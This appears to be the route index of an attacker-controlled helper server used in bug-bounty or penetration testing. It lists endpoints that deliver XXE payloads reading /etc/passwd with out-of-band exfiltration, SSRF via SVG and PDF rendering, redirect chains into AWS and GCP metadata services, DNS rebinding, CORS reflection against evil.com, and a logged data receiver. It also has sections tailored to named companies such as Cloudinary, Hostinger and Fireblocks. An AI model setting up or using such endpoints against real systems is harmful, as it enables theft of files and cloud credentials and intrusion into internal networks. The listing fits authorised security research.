flex.pandalf.net
Generic (program-independent)
GET /redirect?url=<target>&code=302 — HTTP redirect
GET /meta?url=<target>&delay=0 — meta-refresh redirect
GET /js?url=<target> — JavaScript redirect
GET /resp?s=200&b=hello&ct=text/plain&h={"X-Custom":"val"} — custom response
GET /dtd?file=/etc/passwd&exfil=http://oob — XXE DTD
GET /xxe?file=/etc/passwd&exfil=http://oob — complete XXE payload
GET /svg?url=http://169.254.169.254/ — SVG with SSRF
GET /pdf?url=http://target&exfil=http://oob — PDF SSRF (wkhtmltopdf)
GET /chain/3?url=http://final — N-hop redirect chain
GET /delay/5000?url=http://target — delayed redirect (ms, max 30s)
GET /rebind?a=1.2.3.4&b=127.0.0.1&port=80 — DNS rebinding PoC
GET /cors?origin=http://evil.com — CORS reflection
GET /cookie?name=x&value=y&samesite=None — Set-Cookie
GET|POST /exfil — data receiver (logged)
GET /ssrf/list — all SSRF presets
GET /ssrf/imds — SSRF → AWS IMDS
GET /ssrf/imds-ipv6 — SSRF → IMDS via IPv6-mapped
GET /status — health check JSON
Generic (original)
GET /redirect?url=<target>&code=302 — redirect to any URL
Cloudinary (Squid CVE / SVG SSRF)
- /cl/squid — 302 → http://127.0.0.1/
/cl/squid?port=3000&path=/test — 302 → http://127.0.0.1:3000/test
- /cl/meta — 302 → AWS metadata
/cl/meta?type=gcp — 302 → GCP metadata
- /cl/chain — HTML with multiple internal embeds
/cl/fetch?target=<url> — 302 → target (for raw upload API)
Hostinger (Fake WordPress)
- /h/wp-json — WordPress discovery JSON (auth_url → GCP metadata)
/h/wp-json?auth_url=<url> — custom authorization URL
/h/* — catch-all 302 → GCP metadata
Fireblocks (Webhook Redirect)
POST /fb/webhook — receive event, 302 → configured target
/fb/set?url=<target> — set redirect target
- /fb/status — current config & recent events
Monitoring (Redirect Chains)
Front (HelpScout KB Format)
Tools